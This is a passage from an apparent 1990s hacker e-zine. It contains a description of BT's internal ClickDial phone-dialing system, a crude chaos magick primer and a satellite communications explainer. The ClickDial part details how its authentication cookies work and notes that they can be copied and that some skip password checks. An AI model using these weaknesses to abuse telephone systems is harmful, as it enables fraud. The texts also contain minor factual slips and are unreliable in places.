a temporary registration cookie on the registration page containing the 9
digit registration number.

When the user clicks to continue their registration from the starting
registration page the request to the ClickDial server includes the temporary
cookie containing the 9 digit registration number which has just been set.
If a valid CLI has been recorded against this number, the server returns
details of the telephone number, location and PBX type (as shown in
click3.jpg). If ClickDial services from that PBX or line cannot be offered,
because they were not in the random selected 1000 numbers for the test for
example, the registration cookie is simply removed. However, if registration
is successful the cookie is removed then replaced with a long-term ClickDial
cookie.

--> ClickDial Security

The ClickDial cookies mentioned in the last section contain a name and
password which however the user doesn't have to be aware of. The name is
simply constructed from the PBX and Telephone number of the user as
determined during registration and provides a pointer to the user's details,
which are stored on the ClickDial server. The password is a 32-bit random
number generated by the ClickDial server and stored with user details.

When the ClickDial server recieves a request to make a call it expects to
recieve a cookie and the number is then dialled. If the cookie is missing
or cannot be interpreted a page is returned to take the user to the original
registration page. If the cookie is found to be a first-party cookie the
number is dialed and the call is made, otherwise, the recieved password is
checked against the password stored on the ClickDial server for the recieved
name and if anything is found to be non-matching a registration page is again
shown, and no call can take place. BT's argument for this method is that it
can be made as secure as required against forgery by incresing the size of
the password. but it offers no protection against copying cookies. A check
could be made against the IP address of the browser making the call request
however this would fail in the case of machines using DHCP (Dynamic Host
Configuration Protocol).

Normal PC and Network Security precautions are enforced to minimise the
risk of allowing a cookie to be copied. (Check out the Psyclone/MED file
on BT WorldWide Networks Security, and the Juvenile Delinquency file on
Computer security, URL's listed at the end of this text).
There are several methods used by BT to combat fraudulent use/activity.
A transaction log which records the timestamp and IP address from which
each request originated is kept on the ClickDial server. A user who suspects
their telephone and account is being used by someone else can simply access
the "Cancel Registration" webpage on the intranet which will immediatly
invalidate all existing cookies associated with that telephone. After
cancelling registration the user can re-register with a new cookie which
BT say will now be the only cookie for that line.

BT suggest that, Basically ClickDial registration, using both browser and
telephone gives greater security than either a telephone line/pbx or
computer can give separately.

--> ClickDial Networking.

In the ClickDial users and registration section above I went into brief
detail about how a call is made. This is best shown in an ascii diagram
of the network structure.

------- --------------- -------
| First | | | | Third |
| Party | | ClickDial | | Party |
| User | | Server | | User |
-------\ | | /-------
| \ --------------- /
| \ | /
| \ | /
PSTN \ | /
or \ -------------------
PBX. | |
| BT Intranet |
| |
-------------------
/ | \ -------
/ | \ | Phone |
/ | \ -------
/ | \ |
/ | \ |
/ | \ |
----- ----- ----- ----- |
| PBX | | IVR |--| PBX | | PBX |--
----- ----- ----- -----
| | ||| | |
| --------------- | ------------ |
| BTNET | BTNET |
PSTN PSTN PSTN

Its clear to see from the diagram the whole structure of the
BT ClickDial networking, and how everything falls into place.

Two things you may be unclear of however are the "First" and "Third"
"Party Users". This is basically two different ways to connect to
BT Intranet.

First-Party users has local software/hardware that controls their own
telephone line, they have no control over any other line. They could
use a wide variety of software to connect to BT I

  
ntranet, including
The BT Callscape product that sits between the telephone line and
the PC's serial port. For more information on BT Callscape check
the url at the end of this file. They could also use other applications
such as Video Telephony Cards which will make video calls where
avaliable, Modem's which are common and PC Interface cards in special
telephones such as Nortel's Meridian Commmunications Adapter (MCA).

Third-Party users have their telephone controlled by a server acting
on their behalf. Their telephone line is connected to a PBX which
in BT ClickDial is controlled via a WWW Interface.

As you can see, each PBX is connected to both BTnet and the PSTN.
The difference between BTnet and PSTN numbers is pretty simple.
Easily demonstrated in click1.jpg with Eric Allard's profile.

PSTN # - 01473 645740
BTnet # - *7 164 5740

For more information on BTnet check out the BTnet PocketGuide typed
up by Juvenile Delinquency, URL at the end of this text.

Glossary of terms in the diagram..

PBX - Public Branch Exchange
PSTN - Public Switched Telephone Network
BTNET - British Telecom's Internal Network.
IVR - Interactive Voice Response Unit

--> Future

I talked of the random 1000 number trial at Martlesham in this text. It
should be noted that the trial, was spread across three Meridian PBX's and
two BT sites, being BT Laboratories and Eaton Court. The experiences and
results of the trial have directly helped and led to the network architecture
design for a 20,000 user ClickDial system which will be deployed gradually
throughout BT supporting various browsers with improved registration
resources, call profiling and overall system performance. It is an aim that
ClickDial can be intergrated with proprietary contact databases to allow
first and third part CTI users to dial any number efficiently.

Because of ClickDials WWW/CTI interface phone numbers become more than just
phone numbers that can be cut'n'pasted into documents, they can be seen as
URL's and pasted as a url into e-mails and documents using html, or even as
an internet shortcut into e-mail/browsers.

--> Links

Hybrid's file on CTI
- http://www.ninex.com/9x/rawtext/9X_CTI.TXT

Psyclone/MED file on BT Network Security
- http://www.maneatsdog.org.uk/med-wnsp.txt

Juvenile Delinquency file on BT Computer Security
- http://www.angelfire.com/tx/e4/JDSPA12.txt

BT CallScape
- http://www.callscape.bt.com/callscape/cshome.htm

Nortel's Meridian Commmunications Adapter
- http://www.tcscanada.com/meridian/MCA.htm

BTnet Pocket Guide (Juvenile Delinquency)
- http://www.angelfire.com/tx/e4/BTNET.txt

I apoligise for the size of the zip attachment with the jpg's in, but they
are worth the size. :)

werd up to IBTE, hybrid, psyclone, Juvenile Delinquency, 9x, and Eric Allard.

- gr1p


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.5.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


Lifting the skirt of a girl called Reality
- - - - -----------------------------------------------
or
basic procedures and theory in Chaos Magick.

compiled by Synner 1999 (synner@hack.gr)


o blurb

In this textfile I will try to shed on some light in the misinformed
and dark area of Magick. I will try to be brief as possible because Magick
isn't a subject that can be solely covered in one article. To be more
accurate, this textfile is about _Chaos_ Magick solely and not for the other
archaic pre-established Magick systems and dogma.

Do not continue reading further this text if:

a) You want to turn your enemies to frogs, cast fireballs, and dominate
females in order to get some, or you think you can really do such things
on the spot, without the help of Industrial Light & Magic (tm) :P.

b) You want to setup cool "satanic" rituals in order to attract females
with IQ resembling to an oyster.

c) You blindly follow a certain dogma, stuck in one mode of thought.


o The Four Models

Different systems of Magick seem to have different models depicting
everything. The predominant model of Magick was the Spirit Model.
Gods, Goddesses, Entities, Elementals, Angels, and such are real
spirits residing far from the human reality having a seperate
existence from those who dare to deal with them. The Energy Model was
generally aroused in the West, in the discovery of electricity, science,
and magnetism blending Eastern philosophies as Tantra, etc.
Gods, goddesses, and such are considered subtle energies which take
the form of entities when viewed from a limited human sense, and which
are not separate, but merely took form so as to work with them.
The Psychological Model grew out of the arise of Psychoanalysis,
particularly the work of Carl Gustav Jung, and has come to be the dominant
model for explaining Magickal phenomena. In the Psychological Model, the
gods, elementals, demons, etc. have no existence beyond the human-mind;
they are merely symbols or archetypes of deep parts of the human psyche.
The Cybernetics Model is just beginning to creep in as magicians begin
to speculate about the nature of Magick as revealed through the lens of
Information Sciences. As yet it remains incomplete, but a cybernetics-based
view of magical entities might say that they are information systems -
including personal belief, group belief, enviromental systems and
the very fabric of reality itself.

o Goddess Eris.

Thousands of years ago, Ancient Greeks portraited the force that drived
the clowns and fools into happy anarchy, dancing madly clowning around
and the laughter of children (and not the primal Chaos summerians had)
as Eris, The Goddess of Chaos. Eris is the Queen of confusion and weird
synchronicities in everyday events. She is present in all events that have
absolutely no rational explanation and it is said that she has a bizzare
sense of humour. Basically she was a way cool chick. Ancient greek
mythology depicts the confusion Eris have created when she gave a present,
a golden apple that had inscribed the words, "to the most beautiful" to
the three Goddesses, Athena, Aphrodite, and Hera. All the three Goddesses
claimed the apple as their own which that led into a wild fight of which
of the three was the most beautiful. This led into the Judgement of Paris,
the outbreak of the Trojan War, and a major turn in Greek History.

o What is Magick and what does Chaos have to do with it?

Magick is the _science_ and art of influencing/changing/creating the outcome
of a future event in reality.Its not a religion, but it must be considered
rather as a science, or even art in some ways. It is wise here to pinpoint
that there isnt such thing as Black or White Magick, it's rather symbolic.
Black or White are the goals of each individual who wishes to achieve through
Magickal means, and yet this is rather subjective, if you connect Black to
some "evil" deed, and White to some "good" deed, but that comes down to
social/personal structures that have established the right and wrong, the
evil and good. Magick should not be viewed as something of supernatural or
metaphysical; it's part of the Nature as Chaos that is present in all the
Cosmos. Modern Chaos Magick from the other hand was developed (and still is
developing) and established in the same timeline when the Chaos Theory and
non linear mathematics started to flourish in academic areas.


o The difference between the modern chaos Magick and the prestablished
ancient Magickal paradigms.

Contrary to the pre established archaic Magickal systems and dogma like
Kabbalah, Hermetism, Enochian, Satanism which most of them are religion
and not only a pure methodological system of getting things done, Chaos
magicians do not follow blindly a dogma, with its rules, restrictions
and "must" methods. Each individual Magick user develops his own system
of methods, deities systems and so from scratch or by borrowing pieces from
the other paradigms mentioned.This gives him more freedom and a more
personal way that fits him most when applying Magickal acts.

For example:
One who practises the Kabbalah (Magickal system based on the ancient Hewbrew
tradition and the Bible) cannot do Magickal acts based on other Pantheons
(such as Summerian, Egyptian, or Ancient Greek), simply because he must
follow the way that Kabbalah textbooks describe. Simply because in Kabbalah
there is not such thing as a Pantheon, rather than a single God, angelical
beings and evil daemons. Chaos magicians are free from themeselves to do
whatever they want worship any deity they wish, and so on without having
restrictions about what they can or can't do. It is merely a state of mind
and attitude that makes a Chaos Magician be what he is.
The only rule for Chaos magicians is that they have no rules.

o The symbol of Chaos.

All Chaos magicians and not only use this symbol in order to meditate upon
draw energy or to use this as a tool for summoning certain deities that are
in some way related to Chaos (such as Azagthoth, etc and most of the
summerian pantheon).

The aforementioned symbol is an 8 pointed star.

Fig.1

/ \
-- | --
| \ | / |
\ | /
<------O------>
/ | \
| / | \ |
-- | --
\ /

Please excuse my lame ASCII art, but I think you got the point about how it
looks and I am sure that you've seen it somewhere before.


o Programming in a broader sense of meaning.

Mostly, Magickal work is done by programming the psyche of oneself.
Mages beforehand fortify emotionaly themselves, drawing energy and
feeding it their emotions visualizing the desired outcome of the event
while in the end launch this virtual emotional mass of energy directing
it into something that is symbolically linked to the desired outcome.
In mostly all Chaos Magick sourcebooks everything is considered as
'programming' while the universe is considered as a gigantic interlinked
network with an operating system and reality beeing the output of the
processes that run in the background. It is all symbolic of course.


o At the heart of it all

Rituals are the most powerful (and glamorous) ways of doing Magickal acts.
They are a series of constructed events in order for someone to manifest
Magickal energies towards the desired thing. Rituals can be used with robes,
incest, candles, banners, symbols and gestures and such or with on the fly
pure improvisation.

Generally 4 keys play a serious role in a ritual.

a) Atmosphere.
b) Will.
c) Exact intent.
d) Visualization.

The ritual is consisted of 5 stages.

a) Preparation
b) Warming up.
c) Core.
d) Winding down.
e) Debriefing.

We will discuss them all analytically.

First, the thing we should remember before setting a ritual is that we MUST
have a EXACT intent of WHAT we WANT to DO.
Example: (forgive me for the below but that's what popped in my mind)

I WANT TO FUCK JULIE

ehm... good but not enough... let's try better:

I WILL FUCK JULIE

That's more like it.

The second key we have to make sure is that for the desired event to happen;
we must purely want it and not want some other thing in the same time.
Thats called pure Will.

Example:

A thought like this won't do:

"I will fuck Julie, but if I don't and end up fucking Mary, it's ok."

I... think you got the picture.

Another thing we must have in mind is the atmosphere of your surroundings.
Trying to cast a ritual in your bedroom while having your parents, aunts,
uncles and kids in the other house celebrating laughing, playing music
and generally creating unwanted noise isn't the best.
Preferably you should try to do your work in a secluded place, creating
atmosphere with incense, candles, putting on a tape with drone/isolationist
music or mantra's and everything else that you seem proper and fits you
in order for you to be in the right state of mind.

Last, but not least, visualization.
In plain words, fantasy, seeing vividly that you want to achieve before you,
happening, taking place.
Visualization is the most important factor I think in getting everything
done, it's a valuable tool.

After we examined the key factors one by one, we move on to talk about the
stages a mage passes on when casting a ritual.

a) Preparation

Preparation is everything one does before doing anything: cleaning his
workplace, lighting up candles, incense, bathing with aromatic oils,
creating atmosphere for his workings and so.

b) Warming up

This stage is when the mage firstly casts a simple banishing ritual to
relax, clear his mind and induce himself in a trance state called Gnosis.
This state can be reached through meditation, vibrating mantra words or
monotonously repeating a phrase/word until that word becomes meaningless
and plausible, or alien, drumming or dancing.
I am not quite sure about the usage of drugs in order to reach in that
state, marijuana however is not suggested because most of the time
it doesn't help you clear your mind rather than flooding your mind
with millions of thoughts and memories. You have to stay focused.

c) Core

The stage is when the mage after reaching the Gnosis state and begin
to commence the technics which were implemented for the main intention
of the ritual so far which is powered by all the energy and enthusiasm
that was gathered from the start of the rite.
That may involve calling a deity, launching the gathered energies
towards an object that was symbolically linked by the magician
and represents the desired outcome and so on.

d) Winding down

This stage is when the mage is trying to return to himself, drawing away
the emotional fortification he previously had, releasing the tension
and exiting from his trance state.
It should be noted that the more intense the ritual was the more thorough
the 'wind down' must be.
Most Chaos magicians either do this by laughter or forcing themselves to
vomit (not suggested) in order to bring back themselves in the everyday
state they were.

e) Debriefing

The debriefing stage is mostly a post-ritual stage where the magician merely
records anything he wants from the ritual into his personal diary for
further study. This may vary from wierd feelings one felt during the ritual,
something that happened or anything that the mage feels that must be
recorded.

o The Guardian of the Threshold.

You gladly followed the text until this point. After reading the
aforementioned words I am sure that from time to time phrases like this
popped into mind:

"It's all bullshit, why am I reading this?"

etc.

Well, that's your guardian of the threshold. It's a nasty beast that lies
in the core of your own personal programming that was done by the society,
family, surroundings, and etc. that wakes up every time a paradigm shift
small or large occurs in you. The most formidable opponent a mage will
encounter is his own inertia, resistance to change; Ie. the little phrase of
"ah well, I will continue tommorow" or "what am I reading now? It's all
crap." This demon is spawned when one is practising something, and in the
process leaves the interest he had about the subject or the infinite loop of

"I'll start my diet in Monday".

We all know.

The best tools you have to defeat this is determination, effort and
dedication.

o Pathways to Manifestation

Using Magick to increase the probabilities of something to occur one must
have something in mind. You must create pathways for your Magickal energies
to manifest. I'll explain through an example:

Let's say you wanted to pass the midterm exams, and casted a ritual in order
to increase the percentages of your success. It is likely that you would
fail if you weren't paying much of attention in your studies and sat all
day long doing nothing. Magick unfortunately can't help you in that;
Or let's take the example of our aforementioned desire, to fuck Julie. (sigh)
I don't think that would happen if you don't invite her lets say in your
house for a cup of coffee, creating a pathway, in order for your Magickal
energies that were previously launched from the ritual to manifest.
Don't expect her to randomly call you and say, "I'm coming to your place to
have sex with you." Well, you don't know, it may happen, but the
probabilities of this happening is far less.

o Further Reading

This textfile was merely written as a startpoint for you the aware reader
to further deepen your study in this field. It is by no means complete
as you will discover upon further reading.

Some books to mention:

Hine, Phill. Prime Chaos 1993 (Chaos International BM Sorcery, London
WC1N 3XX)
Carroll, Peter J. Liber Kaos, Samuel Weiser 1992.
Spare, A.O. The Collected Works of Austin Osman Spare, The Sorcerer's
Apprentice, 1982.
Younger, Malaclypse the. Principia Discordia, Loompanics Unlimited
Carroll, Peter J. Liber Null & Psychonaut. Samuel Weiser, 1987.

Internet:

A good starting place is www.avatarsearch.com, the first occult based
search engine, get your warez there.


* Chaosbox; Nothing Is True Everything Is Permitted
Synner 1999.


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.7.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


A Different View on Satellites
and Satellite Communication
with Simple Words.

by The Monty
email at: m0nty@hack.gr
check http://www.hack.gr/users/m0nty

+=============+
|| CONTENTS ||
+=============+

o Introduction
o General OverView
o A lil' history
o Satellite's Orbit
o Setting your satellite in Orb1t
o The Satellites
o The Base Stations
.Signals from the Base Station
.Signals from the Satellite
.Watching the Satellite
.Control system and Watching system
o Signal Delay Echo
o Characteristic Frequencies of WESTAR Satellites I, II, III
o Closing


+================+
|| Introduction ||
+================+
The last years there have seen many investments in satellite
telecommunications. Such kind of communications were developed very fast.
Satellite telecommunication is used mainly when you want to bring in
contact two things that are *REALLY* far away or when the distance between
them isn't that big, but there are between them many obstacles that
makes the communication almost immposible (i.e. deserts, jungles etc..).


+====================+
|| General OverView ||
+====================+
A satellite connection consists of the satellite and the base stations
(scheme 1). If you check this from a technical view you could say that
the base stations work as terminals and the satellite as a re-transmitter.

(scheme1)

|~~~~~~~~~~~~~| . where AAA is the signal
| |
| Satellite |
|_____________|
AAA AAA
AAA AAA
////// AAA AAA \\\\\\
//// AAA AAA \\\\
/\\ AAA AAA //\
\\\\ AAA AAA ////
\\\ AAA AAA ///
/\\\ ///// \\\\\ ///\
/ \\\\\/// \\\///// \
/ \ / \
/ BS \ / BS \
~~~~~~~~ ~~~~~~~~



The distance between one base station to the other in order for them
to communicate is about 40-50 kilometers. If you increase this distance
then you will have problems with the curve of the earth. In order
to assure "eye" contact, the stations should be placed in high places
and their antennas in big webs. Besides that, when two base stations
are far apart then the signal isn't stable. This happens cause the
antennas receive more than one signal (they receive the signal AAA that
we want but they receive other signals too from other transmitions after
they reflect on the sea etc). This problem that it would cause are voids
between the conversations.
These problems can't be solved if the distance is about 50 to 100 km.
If the stations are on the land then we can use re-transmitters so that
we won't loose the signal. If the stations have sea among them (one station
in America and the other on Europe) then we would have to put a very
powerfull re-transmit in the middle of atlantic ocean. Well that is imposible,
so how can these stations communicate? They can communicate with a satellite!
The satellites are like a re-transmiter, that aren't placed on earth but on
space (in the three dimensions). The satellite is in a big height so
problems like uncontinuous signals are limited.


+==================+
|| A lil' history ||
+==================+

The first telecommunication satellites were set on passive mode. Which
means that they could only reflect the signals they took from eartch base
stations on their surface. They were something like big baloons without
any electronic shit on them. These satellites were experimental projects
called ECHO 1, ECHO 2 and started space tripping in 1960. In 1962 the
Telstar was launched. Telstar was an active satellite, it had electronic
devices that increased the signal it received. This satellite was used
for the transmision of TV programs (another way to brain-damage you).
On 6 April 1965 a satellite launced over the Atlantic ocean by the name
INTELSAT I, the first telecommunication satelite. It was owned by a
national telecommunication organaization called INTELSAT which was
established in 1964. This satellite was active and it could transmit 240
telephone circuits and a TV program. Since then INTELSAT used the lines of
satellites II, III, IV, IV-A and V were the capacity was always increasing.
The satelites of line V have capacity of 12000 telephone circuits and *TWO*
TV programs (major brain-fuck). Nowdays almost every country of the world
cooperate with INTELSAT and communication can be established even when you
are on a ship.


+=====================+
|| Satellite's Orbit ||
+=====================+

The time that a satellite is doing in order to do the whole round of
the earth is called period (T) and it depends (as physics says) from the
mass of the earth, the mass of the satellite and the distance between the
satellite and the center of the earth. Now since the mass of the satellite
is too small against of the mass of the earth the period depends practically
only from the distance. From physics we have :

2 * pi
T = --------------- * (Re + h)^3/2
Re * g^1/2


With
Re = earth radius
g = acceleration of gravity on the earth's surface
h = satellite's altitude

Now if you put h = 36000 kilometers (km) then the satellite has a period
time T = 24 hours. So lets say that you put a satellite in orbit with
altitude 36OOO km from the surface of the earth above the equator heading
to the East. If you observe the satellite from the surface of the earth
then you'll notice that it doesn't move and it will be seen only from
specific countries. These kind of satellites are called geostationary
(geostationary orbits). Now because these satellites are not totaly steady
when you observe them from the earth they are called synchronous.
Well.. in order to be more exact about the equatorial orbit the altitude
should be 35784km (or 19,322 n.miles or 22234 st.miles) and the period is
23Hrs 56mins and 4.009054sec.


The characteristics of Geostationary Satellite Orbit, for the special
case if a synchronous orbit-satellite in prograde circular orbit over the
equator.

Altitude 19322n.miles, 22235st.miles, 35784km
Period 23Hrs, 56mins, 4009sec (one sidereal day)
Orbit inclination 0o
Velocity 6876 st.miles/hour
Coverage 42.5% of earth surface
Number of satellites Three for global coverage with some areas of overlap
(This will be explained later on)
Subsatellite point On the equator
Area of no coverage Above 81o north and south latitude
Advantages Simpler ground station tracking
No handover problem (Explained later)
Nearly constant range
Very small Doppler shift


If a satellite has different period from the earth then they are called
asynchronous. The asynchronous satellites are setting and rising so the
demand in order to have continious communication with them a large amount
of satellites so that when one of them is setting the other should rise
(handover problem). Of course in every base station there should be 2
antennas, one that communicates with the satellite that is setting and the
other with the one that is rising.

The first experimental satellites where asynchronous. Today the
satellites that INTELSAT uses are synchronous and above the level of the
equator. From a synchronous satellite the earth is seen from a cone
of a 17o angle.

If 3 synchronous satellites get in orbit over the equator in the correct
possitions (areas of overlap 120o) they are able to cover all earth except
the two poles (North and South). These possitions are above the Atlantic,
the Pacific and the Indic oceans. From Greece you are able to see the
satellites that are above the Atlantic and the Indic ocean.


+===================================+
|| Setting your satellite in Orb1t ||
+===================================+

I tried to do some ascii to help but they seemed impossible (how the fuck
can you do a circle with ascii !?!?!?!? heh). The way that i will describe
is in physics.. well it's not the exact way that NASA lunches her sats but
it's based on this. Anyway lets go on with the show. You lunch the
satellite from the earth with a rocket.When the rocket reaches the altitude
of 36OOO km it seperates and leaves the satellite there. Now due to the
velocity that the satellite has from the force (gravity) of the earth
it moves in eliptical orbit. One of the hearth of the ellipses is the
earth with the closest to earth distance 550 km (Perigee) and the farest
from the earth distance 36OOO km (Apogee).

Now, from the earth where you are, you control the satellite remotely and
you order it to lunch small rockets when the satellite is on the farest point
from the earth (Apogee) in such a way so that it could change its eliptical
orbit in circular orbit. The resault of that is that the satellite will change
its orbit to almost circular and due to it's altitude the period will be
24 hours. Thanks to the gravity force from the earth and the velocity of the
satellite you won't have to use any other force to move it (cause of the zero
frictions). This means that you won't have to use anymore fuels.

In reality the possition of the satellite from the earth isn't stable
cause of the sun's and the moon's gravity and the radiation pressure that
affects the satellite. So in order to avoid this just use some of your
fuels to correct your satellite's orbit whenever it shows problems.


+=================+
|| The Satellite ||
+=================+

The satellite as we said above is working as signal re-transmiter. It
receives signals from a base station on earth (or maybe from another
satellite) and resends them back in another base station (or another
satellite).

The satellite receives many signals from the earth stations. These
signals are in the area of 6 GHz but they are all different between them.
When it receives the signals it increases them and sends them back in all
base stations *BUT* it uses the area of 4 GHz to do that. Which means that
the satellite dicreases the communication frequency when it sends back.

Every base station when it receives from the satellite chooses that
frequency area that conteins the signals of the base stations that
send them on the satellite. Now with more simple words, the base station
A wants to communicate with the base station B. So the A sends the signal
on the satellite in 6 GHz frequency. The satellite sends the signal in 4
GHz at the base station B, among with signals for other base stations. The
base station B now, chooses the frequency area that has the signal that
was send from the base station A. (I hope that didn't mess much with your
minds if it did it's cause ma english suck).

Anyway, the frequency area that is used is:
5925 - 6425 MHz from the earth to the satellite.
3700 - 4200 MHz from the satellite to the earth.
INTELSAT-V though uses besides these, the area 14/11 GHz (where 14 is from
earth to satellite and 11 from satellite to earth)
Nowdays they experiment with many other frequencies (Small brief later)

A telecommunication satellite consists from:
o The antennas
o The information, control and remotely control centers
o The electricity system
o The transponders

The satellite has antennas that operates in the area of the microwaves
with radiation diagram pointed to the earth so that it wouldn't transmit
energy radiation to the space. These antennas are used for re-transmiting.
Besides these antennas it has another set of antennas for HF (3 - 30MHz)
and VHF (30 - 300MHz) for its remotely control from the earth.

Now a bit ascii gfx!!!! I will show a simple diagram of te INTELSAT-III
This satellite has 2 transponders of 225MHz that uses the same antenna
with angle 17o.

(scheme2)
5930-6155MHz 3705-3930MHz Point
|~~~~~~~| |~~~~~| |~~~~~| |~~~~| |
Starting | | | M | | E | | E | |
Point |~~~~~~~~~~| E |~~~~|_____|~~~|_____|~~|____|~~~~~| |
| | |_______| | | |
| | | | |
| | | | |
| |~~~~~| | |____|
|_____| | | |
|_____| 2225MHz |
| | |
| | |
| |~~~~~~~| |~~~~~| |~~~~~| |~~~~| |
| | | | M | | E | | E | |
|~~~~~~~~~~| E |~~~~|_____|~~~|_____|~~|____|~~~~~|
|_______|
6195-6420MHz 3970-4195Mhz

The satellite's antenna that receives the signal comes from a base
station on earth and it's a signal in the area of 6 GHz. This signal is
being enhanced with the help of the transponders and then with the
help of the 2225MHz frequency it dicreaces the frequency area of the
signal in 4 GHz. After to steps of enhancing the signal is send back in
the antenna. The anametabibastes enhance the signal at 104dB so the
frequency area from 6 GHz changes to 4 GHz. The satellite INTELSAT-IV
uses 12 anametabibastes of 36MHz.

With the control centers and the other electronic sh1tz that i can't
ofcourse ascii graph them the satellite sends information about it's
operating status to the base stations on earth. So if the dewds at the
base station find that something is wrong with the orbit or the possition
of the antennas they remotely change them and fix the problem.

The electronic shitz that are on the satellite should be extremly light
with little dimentions. They should need small amount of electricity and
should not be easy damage. The constractors of the satellite in order
to achive this are using special matereals after they have tested them
on high temporature and other strength tests.
The electricity is given to the satellite from light-elements that
transforms the solar energy to electric. These elements til the lines of
INTELSAT-IV were covering the outside of the satellite. Now in the
INTELSAT-V they use big wings with them on. In order to protect these
fwtostoixeia from obstacles that may hit the satellite they are covered
with a special material that lets the solar beems come through it. Inside
the satellite there are accumulators that get charged in order to use
the electricity later (ie when the satellite is in the shadow of the
earth and the solar beams can't hit its wings). Well thats all for the
satellite, now we'll talk about the base stations.


+=================+
|| Base Stations ||
+=================+

A base station consists from:
o Antennas
o Radioelectric devices
o The control panel
o The electricity devices

In the base stations for satellites they use Cassegrain antennas (I will
describe most kinds of antennas in another article). This antenna is able
to move and rotate in different ways. The antennas are "installed" in
different geografic longitudes and latitudes. So the angles that they
"observe" the satellite (elevation angle or look angle) are different.
However even in the base station the look angle of one satellite differs
from the angle of another satellite.

As we show above the satellite isn't stable. So in order for the base
station's antennas to watch the satellite all the time it should rotate
too.

> Signals From the Base Station
The signal that comes from the TV spectrum is going in a special
device that forms it in the 70 MHz frequency. When the signal gets outta
there it goes in the frequency transformer which transforms the signal
from 70 MHz in the area of 6 GHz. The signal goes through amplifiers and
from there it is send to the antenna and the satellite.

> Signals From the Satellite
The signal that comes from the satellite is in the area of 3700 to
4200 MHz and is gothered at the antenna in order to be send at the
base station. Cause of the "weakness" of the signal it goes through many
amplifiers (parametric amplifiers). These parametric amplifiers are
freezed in a 20o Kelvin degrees (which is -253o Celsius) in order to
avoid any additional noise. The amplified signal now goes through the
received frequency transformers and they transform the signal from the
area of 3700 - 4200 MHz in the area of 70 MHz. The signal at last goes
in a special device that turns it in TV spectrum. We should should be
noticed that for each country that the satellite communicates there's
a different frequency transformer.

> Watching the satellite
The base station's antennas must point all the time the satellite.
The different possitions that the antenna should take each time the
satellite moves can be done either manually either automaticly.
The automatic watch of the satellite from the antenna is done by a
signal that is send from the satellite. This signal is controlled from
4 points, 2 at the vertical and 2 at the horizontial diameter of the
antenna. When the antenna is not pointing the satellite then the time
that the signal comes in those 4 points is different. This time difference
causes (with the appropriate hardware) the antenna to move in the
exact possition that points at the satellite.

> Control System and Watching System
Yup! There is a big room where everything is controled. In this room
(console room) there are all the hardware that gives you the chance
to control the satellite. From there they count the level of the signal
and they can check the antenna's possition. There are also hardware that
indicates the status of the main devices like frequency transformer. And
of course a big screen (if they transmit TV program) that gives them
the chance to watch the TV program and ofcoz fuk up their brains.
The base station gets it's electricity that it wants from the countrys
national power provider. Of course there are systems that can backup
the station incase of a temporary power down.


+=========================+
|| Signal Delay and Echo ||
+=========================+

It's not difficult to understand that since the satellite is on about
36000km above the earth surface the time that the signal wants to be send
from a base station A on earth to the satellite and then back to a base
station B on earth is important. The smaller distance of the above course
is about 72000km. Now the velocity of an electromagnetic wave in space
is about 300.000 km/sec so the signal needs in order to get from one
base station to another via a satellite about 240 ms.
If this is about voice communication then the same delay will be for
the reverse course. So two people will have about 0.5sec delay in their
conversation. This may seems not a big deal maybe cause you are unfamiliar
with delays (ask someone who blueboxed, we know about delays!).
This delay creates an additional problem, it creates echo. The echo is
being created from the refleaction of a part of the signal in the point
that the 4line connection becomes 2line. This recycled signal comes back
to the one that spoke so he hears his echo.

(scheme3)

--1--> --1-->
____________|\_____|\________
| |/ |/ |
| |
| |
|~~~~~~| |~~~~~~~~|
-1--> | | | | --1-->
A--------| | | |-----------B
<--2-- |______| |________| <--2--
| |
| |
| |
|_________|\_______|\________|
<--2-- |/ |/ <--2--


The arrows with 1 (--1-->) show the course of the normal signal and the
arrows with 2 (<--2--) shows the course of the signal that comes from the
reflection so it causes echo. In order to deal with the echo problem they
install some special devices that decrease the phenomenon of echo. These
devices increase the normal signal and dicreases the signal that creates
echo.


+==============================================================+
|| Characteristic Frequencies of WESTAR Satellites I, II, III ||
+==============================================================+

In the near future I'll write a phile with all these freqencies about
many satellites. But till then check these out

WESTAR I, II, III
~~~~~~~~~~~~~~~~~~~
Sponsoring Activity: Western Union, 1 Lake St., Upper Saddle Rive, N.J.

Other ownership
Interests : Fairchild Industries and Continental Telecom,Inc.,
which jointly own American Satellite Corp.

Subsatellite Points: Westar I and II, 79o W
Westar III, 91o W

Capacity per Transponder: 1500 one-way VF channels or 1 TV signal with audio
or 60 Mbps of data


Channels
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 1 2 3 4 5 6 7 8 9 10 11 12 |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 5945 5985 6025 6065 6105 6145 6185 6225 6265 6305 6345 6385 |
| |
5925 Receive Band 6425
| |
| |
| |
| |
| Channels |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 1 2 3 4 5 6 7 8 9 10 11 12 |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 3720 3760 3800 3840 3880 3920 3960 4000 4040 4080 4120 4160 |
| |
3700 Transmit Band 4200


+===========+
|| Closing ||
+===========+
Well that was it.. Hope you enjoyed the phile. My poor english may
caused you some difficulties on understanding some parts so if you have
any questions just email me.
Greetings one channels #9x #grhack #banana #b4b0 #darkcyde
#bluebox(IRCnet) #hax(IRCnet). Special thanxx to the teams 9x, b4b0 and
d4rkcyde. This phile was written by The Monty.


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
